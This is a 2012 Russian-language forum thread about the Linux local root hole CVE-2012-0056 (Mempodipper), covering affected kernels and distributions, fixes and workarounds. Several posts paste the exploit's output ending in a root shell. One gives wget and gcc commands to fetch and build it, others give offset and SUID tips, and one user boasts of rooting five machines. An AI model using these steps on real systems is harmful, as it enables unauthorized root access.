форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

""	+/–
Сообщение от opennews on 23-Янв-12, 16:00
URL: Новость: http://www.opennet.dev/opennews/art.shtml?num=32872
Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "Найдена очередная local root уязвимость в Linux ядрах 2.6.39..."	+3 +/–
Сообщение от birdie on 23-Янв-12, 16:00
Работает - запускал в виртуалке (фиг знает что там за shell code): Ядро 3.2.1: $ ./a.out =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/2684/mem in child. [+] Sending fd 3 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x8049a44. [+] Calculating su padding. [+] Seeking to offset 0x8049a38. [+] Executing su with shellcode. # whoami root
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	181. "Найдена очередная local root уязвимость в Linux ядрах 2.6.39..."	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 23:44
	> Работает - запускал в виртуалке (фиг знает что там за shell code): А оно там со _всеми_ исходниками, и прога, и шеллкод. См http://git.zx2c4.com/CVE-2012-0056/tree/ Субъективно - довольно простой и честный код, не вижу откровенных заподлян в отличие от кислотных сук с крайне мутным кодом и хзчтоделающим шеллкодом.
	Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от ВКПб on 23-Янв-12, 16:48
C grsecurity не сработал эксплойт.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	20. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от deadless (ok) on 23-Янв-12, 17:22
	а с SELinux ?
	Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

	41. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от ВКПб on 23-Янв-12, 18:00
	Зависит от обрезанности /proc.
	Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

4. "В ядре Linux найдена локальная root-уязвимость"	+25 +/–
Сообщение от Аноним (??) on 23-Янв-12, 16:48
Ого, какая продинутая и нетривиальная атака. Целый детектив по обходу затычек и проверок, с epic win-ом в конце. Обнаруживший это - реальный молоток, с мышлением истинного хакера. Там где программист думает "как сделать чтобы работало", хакер думает "а как бы мне сделать чтобы оно нае...лось?!"
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Найдена локальная root-уязвимость в ядрах Linux 2.6.39 и выш..."	–4 +/–
Сообщение от abra (ok) on 23-Янв-12, 16:49
Linux localhost 3.2.0-10-generic #17-Ubuntu SMP Thu Jan 19 19:04:20 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux тоже работает
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	217. "Найдена локальная root-уязвимость в ядрах Linux 2.6.39 и выш..."	+/–
	Сообщение от XoRe (ok) on 25-Янв-12, 18:52
	> Linux localhost 3.2.0-10-generic #17-Ubuntu SMP Thu Jan 19 19:04:20 UTC 2012 x86_64 > x86_64 x86_64 GNU/Linux > тоже работает мы атакуем ваш localhost )
	Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

6. "В ядре Linux найдена локальная root-уязвимость"	+10 +/–
Сообщение от Микро on 23-Янв-12, 16:56
Порутал 5 машин уже, спасибо.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	49. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Клыкастый2 on 23-Янв-12, 18:27
	> Порутал 5 машин уже, спасибо. :)))) ай какой нехорооооший....
	Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

8. "В ядре Linux найдена локальная root-уязвимость"	–12 +/–
Сообщение от Дмитрий (??) on 23-Янв-12, 17:01
2.6.32-5-686-bigmem SMP i686 Debian Squeeze user@usercomp:/tmp/1$ ./a.out ... [+] Seeking to offset 0x8049a29. [+] Executing su with shellcode. user@usercomp:/tmp/1$ ЧЯДНТ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	10. "В ядре Linux найдена локальная root-уязвимость"	+3 +/–
	Сообщение от Аноним (??) on 23-Янв-12, 17:02
	Написано же - с ядер. 2.6.39
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	11. "В ядре Linux найдена локальная root-уязвимость"	+7 +/–
	Сообщение от Аноним (??) on 23-Янв-12, 17:02
	> ЧЯДНТ? Новость не читаешь. Там русским по болотному написано: работает для ядер .39 и новее.
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	12. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arachnid (ok) on 23-Янв-12, 17:03
	номер ядер сравни :)
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	13. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 23-Янв-12, 17:04
	> 2.6.32-5-686-bigmem SMP i686 Debian Squeeze > ЧЯДНТ? Перечитайте о каких версиях ядра идёт речь.
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	14. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от anthonio (ok) on 23-Янв-12, 17:09
	читаешь хреново... >= 2.6.39
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	15. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от CrOrc on 23-Янв-12, 17:09
	Сказано: начиная с 2.6.39. В Debian 2.6.39 только в testing и backports.
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	18. "В ядре Linux найдена локальная root-уязвимость"	+19 +/–
	Сообщение от Lain_13 on 23-Янв-12, 17:20
	Мне так показалось, что выше не совсем ясно сказали, что дело в версии ядра, а потому я тоже обращу на это внимание.
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	75. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от ASM (??) on 23-Янв-12, 19:33
	обратите внимание на версию ядра
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	84. "В ядре Linux найдена локальная root-уязвимость"	+3 +/–
	Сообщение от phaoost (ok) on 23-Янв-12, 20:41
	да-да, обратите внимание на версию ядра
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	167. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 16:49
	> да-да, обратите внимание на версию ядра Думаю, нужно всё-таки ядро поновее, .39 там или выше. Обратите внимание на версию ядра.
	Ответить | Правка | ^ к родителю #84 | Наверх | Cообщить модератору

	116. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 00:25
	Скорее всего, дело в версии вашего ядра.
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	119. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 05:30
	Для тугодумов: человек акцентировал внимание на том, что не нужно гнаться за версиями. Нужно сидеть на стабильненьком дебиане, без уязвимостей.
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	234. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от taz on 01-Фев-12, 16:29
	ой лол, а сквиз уже не стабилен вдруг? ;)
	Ответить | Правка | ^ к родителю #119 | Наверх | Cообщить модератору

	218. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от XoRe (ok) on 25-Янв-12, 18:55
	> ЧЯДНТ? Думаете, в версиях с 2.6.32 по 2.6.39 только цыфырку меняли? В 2.67.32 вполне может быть дырка, которую уже закрыли в новых версиях. Дырку от 2.6.39 тоже вполне оперативно закроют. Сидеть на одной версии можно. Но что вы будете делать, когда найдут дырку в вашей версии ядра?
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	221. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от RusAlex on 25-Янв-12, 23:38
	дело в том, что в версии .39 была убрана дополнительная проверка, вледствие чего уязвимость и стала возможной.
	Ответить | Правка | ^ к родителю #218 | Наверх | Cообщить модератору

	225. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от Andrey Mitrofanov on 26-Янв-12, 10:37
	> с 2.6.32 > В 2.67.32 вполне может быть дырка, которую уже закрыли в новых версиях. Вам привет от Грега КХ и 2.6.32.55. > Но что вы будете делать, когда найдут дырку в вашей версии ядра? Про дистрибутивы не слышали? Про обновления безопасности?? Да! Расскажите нам ещё про дИрки!! </tag>
	Ответить | Правка | ^ к родителю #218 | Наверх | Cообщить модератору

16. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от ALex_hha (ok) on 23-Янв-12, 17:14
А RHEL то зачем приплели, там 2.6.32
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	24. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от solardiz (ok) on 23-Янв-12, 17:28
	Там не 2.6.32, а своя ветка, уже давно ушедшая от 2.6.32 на приличное расстояние. "CVE-2012-0056 affects the Linux kernel as shipped with Red Hat Enterprise Linux 6 from version 2.6.32-220.el6 (RHSA-2011:1530) and later, and Red Hat Enterprise MRG from version 2.6.33.9-rt31.75.el6rt (RHSA-2011:1253) and later. (The kernels shipped with RHSA-2011:1530 and RHSA-2011:1253 included a backport of upstream git commit 198214a7.)"
	Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

19. "В ядре Linux найдена локальная root-уязвимость"	+6 +/–
Сообщение от solardiz (ok) on 23-Янв-12, 17:20
Проблеме также подвержены свежие ядра из RHEL 6 (новость исправил). Вот анализ от Red Hat: https://access.redhat.com/kb/docs/DOC-69129 https://bugzilla.redhat.com/show_bug.cgi?id=782642 Там же - workaround с использованием SystemTap. Другой workaround - убрать пользователям доступ ко всем SUID/SGID программам. К сожалению, исправление в git от 17-го января привносит другую проблему, сравнительно небольшую (обход RLIMIT_NPROC * RLIMIT_AS): http://www.openwall.com/lists/oss-security/2012/01/22/5 Дискуссия на /r/netsec: http://www.reddit.com/r/netsec/comments/os8wl/linux_local_pr.../ Более старые ядра именно этой атаке не подвержены, но могут быть подвержены схожим атакам через чтение (а не запись) того же /proc/<pid>/mem. Конкретных атак (attack vectors) пока нет (пока не нашли такой программы и такого способа атаки, чтобы это было проблемой безопасности); в теории, это может быть утечка криптографических ключей, хешей паролей и т.п. Исправление этого обсуждается. В любом случае, это будет другой номер CVE.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	156. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от Аноним (??) on 24-Янв-12, 14:13
	Читать ваши комментарии на опеннете, пожалуй, интереснее всех остальных.
	Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

22. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
Сообщение от Аноним (??) on 23-Янв-12, 17:25
> На данный момент ни один из дистрибутивов данную ошибку не закрыл. Debian stable не повержен насколько я понял.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	42. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от Michael Shigorin (ok) on 23-Янв-12, 18:10
	>> На данный момент ни один из дистрибутивов данную ошибку не закрыл. Неправда. > Debian stable не повержен насколько я понял. Он и не был подвержен с 2.6.32, очевидно.  А в альте исправили три дня тому в 3.0/3.2: http://packages.altlinux.org/en/t6/srpms/kernel-image-std-de... http://packages.altlinux.org/en/t6/srpms/kernel-image-un-def...
	Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

	169. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от vle (ok) on 24-Янв-12, 17:18
	> А в альте исправили три дня тому в 3.0/3.2: > http://packages.altlinux.org/en/t6/srpms/kernel-image-std-de... > http://packages.altlinux.org/en/t6/srpms/kernel-image-un-def... По поводу ASLR/PIE в качестве защиты. В ядре 2.6.26 /proc/*/maps выставлен флаг чтения для ВСЕХ. Более новых ядер у меня нет, чтоб посмотреть. Проверьте у себя. JFYI: http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/miscfs/procfs/pr...
	Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

23. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Андрей (??) on 23-Янв-12, 17:27
uname -a Linux big.home.local 3.2.1-gentoo #1 SMP Sat Jan 14 19:21:48 MSK 2012 x86_64 AMD Athlon(tm) II X2 215 Processor AuthenticAMD GNU/Linux не работает :S ./a.out =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/9108/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [-] Could not resolve /bin/su. Specify the exit@plt function address manually. [-] Usage: ./a.out -o ADDRESS [-] Example: ./a.out -o 0x402178
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	120. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от anonymous (??) on 24-Янв-12, 05:56
	скопируй в /bin/su любой суидный исполняемый файл, заработает.
	Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

	121. "В ядре Linux найдена локальная root-уязвимость"	+6 +/–
	Сообщение от arisu (ok) on 24-Янв-12, 05:59
	> скопируй в /bin/su любой суидный исполняемый файл, заработает. а может, сразу уже пароль рута вести и не мучаться?
	Ответить | Правка | ^ к родителю #120 | Наверх | Cообщить модератору

	184. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 00:01
	> а может, сразу уже пароль рута вести и не мучаться? Угадать адрес в su как-то зело проще чем пароль от рута.
	Ответить | Правка | ^ к родителю #121 | Наверх | Cообщить модератору

25. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от bircoph (ok) on 23-Янв-12, 17:28
Разные машины с Gentoo, ядра 2.6.39.3, 3.0.8, 3.1.6. Ни один из эксплойтов не работает 8-P
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	28. "В ядре Linux найдена локальная root-уязвимость"	+9 +/–
	Сообщение от Кровавый on 23-Янв-12, 17:35
	Ну это же Gentoo. Надо было курить маны, потом пересобирать! ;)
	Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

	29. "В ядре Linux найдена локальная root-уязвимость"	+5 +/–
	Сообщение от sig_wall on 23-Янв-12, 17:35
	в генте /bin/su нечитаем для обычного юзера - надо указывать оффсет вручную. в моей генте подошло -o 0x402100
	Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

	46. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Michael Shigorin (ok) on 23-Янв-12, 18:18
	> в генте /bin/su нечитаем для обычного юзера - надо указывать оффсет вручную. В ALT -- обычно тоже, доступных всем suid binaries негусто.
	Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

	88. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 23-Янв-12, 21:34
	> В ALT -- обычно тоже, доступных всем suid binaries негусто. А зачем нужен su недоступный пользователю? :))
	Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

	96. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Michael Shigorin (ok) on 23-Янв-12, 22:10
	>> В ALT -- обычно тоже, доступных всем suid binaries негусто. > А зачем нужен su недоступный пользователю? :)) 1) для понижения привилегий рутом; 2) если недоступен всем, то это ещё не значит, что недоступен и wheel.
	Ответить | Правка | ^ к родителю #88 | Наверх | Cообщить модератору

	178. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 23:23
	> 1) для понижения привилегий рутом; А я почему-то всегда думал что su в основном нужен чтобы разрешить сильно некоторые административные операции выборочно некоторым пользователям, гранулярно, контролируемо и не более чем необходимо. Обувание рута на права - напоминает закручивание гвоздя отверткой. Если права не нужны - зачем тогда рутом логиниться? > 2) если недоступен всем, то это ещё не значит, что недоступен и wheel. Наверное прикольно когда права доступа раскиданы по 2 разным местам - участию в группе и самому конфигу суды. Мне такой подход кажется несколько кривым/неудобным.
	Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

	183. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Michael Shigorin (ok) on 24-Янв-12, 23:55
	> А я почему-то всегда думал [...] http://www.opennet.dev/openforum/vsluhforumID3/73378.html#19 > Если права не нужны - зачем тогда рутом логиниться? Необязательно эти права унаследованы от login(1). :) >> 2) если недоступен всем, то это ещё не значит, что недоступен и wheel. > Наверное прикольно когда права доступа раскиданы по 2 разным местам - участию > в группе и самому конфигу суды. В конфиг смотрит сама программа, а вот группой можно ограничить доступ на её запуск. > Мне такой подход кажется несколько кривым/неудобным. В ALT (и как понимаю -- Owl) это может быть control sudo wheelonly: http://www.altlinux.org/Control
	Ответить | Правка | ^ к родителю #178 | Наверх | Cообщить модератору

	186. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 00:12
	Упс. Я тормоз и почему-то подумал в этот момент о sudo, на основании чего меня  проглючило. Высказанное насчет правов относилось больше к sudo вообще. В том плане что через него удобно пользователя подбрасывать в правах на немного и для сильно некоторых операций.
	Ответить | Правка | ^ к родителю #183 | Наверх | Cообщить модератору

	114. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от arisu (ok) on 24-Янв-12, 00:00
	> А зачем нужен su недоступный пользователю? :)) доступность для запуска != доступность для чтения. ваш Кэп.
	Ответить | Правка | ^ к родителю #88 | Наверх | Cообщить модератору

	152. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 13:32
	зачем читать su?
	Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

	179. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 23:29
	> доступность для запуска != доступность для чтения. ваш Кэп. А, я думал пользователя просто совсем обули на какую либо деятельность с su. А в чем профит запрета чтения файла su при доступности его выполнения? Если в затыкании сплойтов типа этого - так это совсем уж как-то в стиле "windows xp with firewall.jpg" - серьезно настроенный деятель адрес так или иначе добудет. Хотя-бы взяв файл из пакета.
	Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

	180. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 24-Янв-12, 23:35
	> А в чем профит запрета чтения файла su при доступности его выполнения? а зачем обычному юзеру его читать? мало ли, какая там информация, всё-таки suid.
	Ответить | Правка | ^ к родителю #179 | Наверх | Cообщить модератору

	187. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 00:17
	> а зачем обычному юзеру его читать? мало ли, какая там информация, всё-таки suid. Собственно, обычный пользователь может его из пакета качнуть, так что если там какая информация - она и так добываема этим пользователем.
	Ответить | Правка | ^ к родителю #180 | Наверх | Cообщить модератору

	189. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 25-Янв-12, 00:23
	> Собственно, обычный пользователь может его из пакета качнуть орли? не путаем админа локалхоста и «обычного юзера»? да, я в курсе, что пакет может добыть из интернетов кто угодно. если человек знает, что это, где это и так далее — это уже не обычный юзер. раз. два: под словами «обычному юзеру» вполне очевидно подразумевалось «программа с правами обыкновенного лимитированого юзера». если в твоём кругу принято читать распечатки машинного кода на ночь — я рад за тебя. в моём — не принято.
	Ответить | Правка | ^ к родителю #187 | Наверх | Cообщить модератору

	182. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 23:48
	>> доступность для запуска != доступность для чтения. ваш Кэп. > А, я думал пользователя просто совсем обули на какую либо деятельность с > su. А в чем профит запрета чтения файла su при доступности > его выполнения? Если в затыкании сплойтов типа этого - так это > совсем уж как-то в стиле "windows xp with firewall.jpg" - серьезно > настроенный деятель адрес так или иначе добудет. Хотя-бы взяв файл из > пакета. Сколько вон дырок находили в glibc. Не удивлюсь, если завтра опять через дыру в дебрях ld.so/ldd можно будет получить рута. Ну, кроме ldd /path/to/crafted/elf.
	Ответить | Правка | ^ к родителю #179 | Наверх | Cообщить модератору

	77. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Андрей (??) on 23-Янв-12, 19:57
	ну это, наверное, PIC "виноват"?:)
	Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

	170. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от vle (ok) on 24-Янв-12, 17:21
	> ну это, наверное, PIC "виноват"?:) ls -la /proc/1/maps; uname -srm что говорят?
	Ответить | Правка | ^ к родителю #77 | Наверх | Cообщить модератору

	151. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arsenicum (??) on 24-Янв-12, 12:57
	Сырцы обновили, теперь в указании смещения нет необходимости. 3.1.6-gentoo — работает.
	Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

	157. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 24-Янв-12, 14:22
	что-то не вижу обновлений.
	Ответить | Правка | ^ к родителю #151 | Наверх | Cообщить модератору

	166. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arsenicum (??) on 24-Янв-12, 16:38
	http://git.zx2c4.com/CVE-2012-0056/
	Ответить | Правка | ^ к родителю #157 | Наверх | Cообщить модератору

	176. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 24-Янв-12, 21:33
	> http://git.zx2c4.com/CVE-2012-0056/ хм. таки да.
	Ответить | Правка | ^ к родителю #166 | Наверх | Cообщить модератору

	145. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аркола on 24-Янв-12, 11:29
	Ну ты не так собрал :)
	Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

26. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от savant (ok) on 23-Янв-12, 17:31
А для ARM будет работать?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	36. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от EuPhobos (ok) on 23-Янв-12, 17:53
	Будет, но эксплоит нужен соответсвующий..
	Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

	190. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 01:00
	> А для ARM будет работать? По дефолту не будет. Там в нескольких местах есть: #else #error "That platform is not supported." #endif Но в принципе и для ARM можно поправить при сильном желании. Нет шеллкода и некоторые архитектурозависимых сущностей.
	Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

27. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от FiX лень логиниться on 23-Янв-12, 17:34
Linux fix-laptop 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 06:50:31 CET 2012 x86_64 Intel(R) Core(TM) i7-2617M CPU @ 1.50GHz GenuineIntel GNU/Linux Подозреваю, что уже пофиксено? Тогда в топике дезинформация - Arch не попадает в список.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	30. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от FiX лень логиниться on 23-Янв-12, 17:36
	Хм... пишут, что на 3.2.1 все же работает. Получается, что дырка до сих пор не исправлена даже в официальном ядре?
	Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

	39. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от solardiz (ok) on 23-Янв-12, 17:57
	> Получается, что дырка до сих пор не исправлена даже в официальном ядре? Исправлена 17-го числа. 3.2.1 вышел раньше. 3.3-rc1 вышел 19-го и, думаю, уже содержит это исправление.
	Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

	32. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Anonimous on 23-Янв-12, 17:39
	Тоже ядро, тот же Arch. Не работает: segmentation fault ./mempodipper
	Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

	79. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от анон on 23-Янв-12, 19:59
	> Тоже ядро, тот же Arch. Не работает: segmentation fault ./mempodipper Как его вообще скомпилить %) ???
	Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

	111. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от emg81 (ok) on 23-Янв-12, 23:55
	$ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c $ gcc mempodipper.c $ скомпилен файл a.out. разве это сложно? :)
	Ответить | Правка | ^ к родителю #79 | Наверх | Cообщить модератору

	112. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от дон педро on 23-Янв-12, 23:58
	подтверждаю. в арче не работает.
	Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

33. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 17:41
В https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0056 написано: > Candidate assigned on 20111207 Это страшно.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	37. "В ядре Linux найдена локальная root-уязвимость"	+5 +/–
	Сообщение от solardiz (ok) on 23-Янв-12, 17:54
	Вовсе не страшно. CNA, включая Red Hat, получают пулы CVE-номеров заранее, еще не под конкретные уязвимости. Как я понимаю, видимая на cve.mitre.org дата - это дата выделения очередного пула в данном случае Red Hat'у. http://cve.mitre.org/cve/cna.html А реально этот CVE-номер был присвоен именно этой уязвимости вот где и когда: http://www.openwall.com/lists/oss-security/2012/01/18/2 т.е. почти сразу после исправления в git и первого постинга в oss-security - собственно, он и был CVE request'ом (в данном случае от одного сотрудника Red Hat другому, но публично - в целях transparency процесса и доступности CVE id сразу и другим distro vendors). Red Hat здесь сработал отлично. Я не вижу, что они могли сделать лучше.
	Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

43. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 18:12
Снова человеческий фактор легкомыслия. Исправления таких вещей надо публиковать после того как вендоры выпустят обновления (лучше на день или два позже). Неужели и в наш век в сети можно найти сервис где локальные учетки раздают?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	47. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Клыкастый2 on 23-Янв-12, 18:18
	>  Исправления таких вещей надо публиковать после того как вендоры выпустят обновления это да, ато вдруг внезапно выяснится, что apt-get-kiddies не в состоянии патч наложить. > Неужели и в наш век в сети можно найти сервис где локальные учетки раздают? точно не скажу, но без виртуализации я бы не рискнул. Более тонкий вопрос: внутри одной конторы. Например кроме админа есть товарисчи, имеющие шелл. Они вроде как и свои, но как бы не сильно хотелось, чтобы у них был рут.
	Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

	91. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 23-Янв-12, 21:38
	> это да, ато вдруг внезапно выяснится, что apt-get-kiddies не в состоянии патч > наложить. У аптгетчиков уже апдейт прилетел, приколись? Оперативно работают, ядро прилетает одновременно с новостью :)
	Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

	105. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от Аноним (??) on 23-Янв-12, 23:29
	> У аптгетчиков уже апдейт прилетел, приколись? Оперативно работают, ядро прилетает одновременно > с новостью :) У других апгетчиков, нестабильных, апдейт пока прилетать не планирует.
	Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

	191. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 01:03
	> У других апгетчиков, нестабильных, апдейт пока прилетать не планирует. В убунтах например прилетело очень быстро, буквально вместе с новостью.
	Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

	160. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от Аноним (??) on 24-Янв-12, 15:36
	> У аптгетчиков уже апдейт прилетел, приколись? Оперативно работают, ядро прилетает одновременно с новостью :) В комплекте с закрытием этой уязвимости - прилетело открытие новой. В общем, нет покоя аптгетчикам :)
	Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

	188. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Michael Shigorin (ok) on 25-Янв-12, 00:23
	> В комплекте с закрытием этой уязвимости - прилетело открытие новой. (глядя в почту) В упор не наблюдаю. > В общем, нет покоя аптгетчикам :) apt-get yaawn :)
	Ответить | Правка | ^ к родителю #160 | Наверх | Cообщить модератору

	192. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 01:05
	> В комплекте с закрытием этой уязвимости - прилетело открытие новой. Что за новая уязвимость? Пруф? > В общем, нет покоя аптгетчикам :) А остальные чем принципиально лучше/хуже? У них дырки чтоли персональные? :)
	Ответить | Правка | ^ к родителю #160 | Наверх | Cообщить модератору

	202. "В ядре Linux найдена локальная root-уязвимость"	+/–
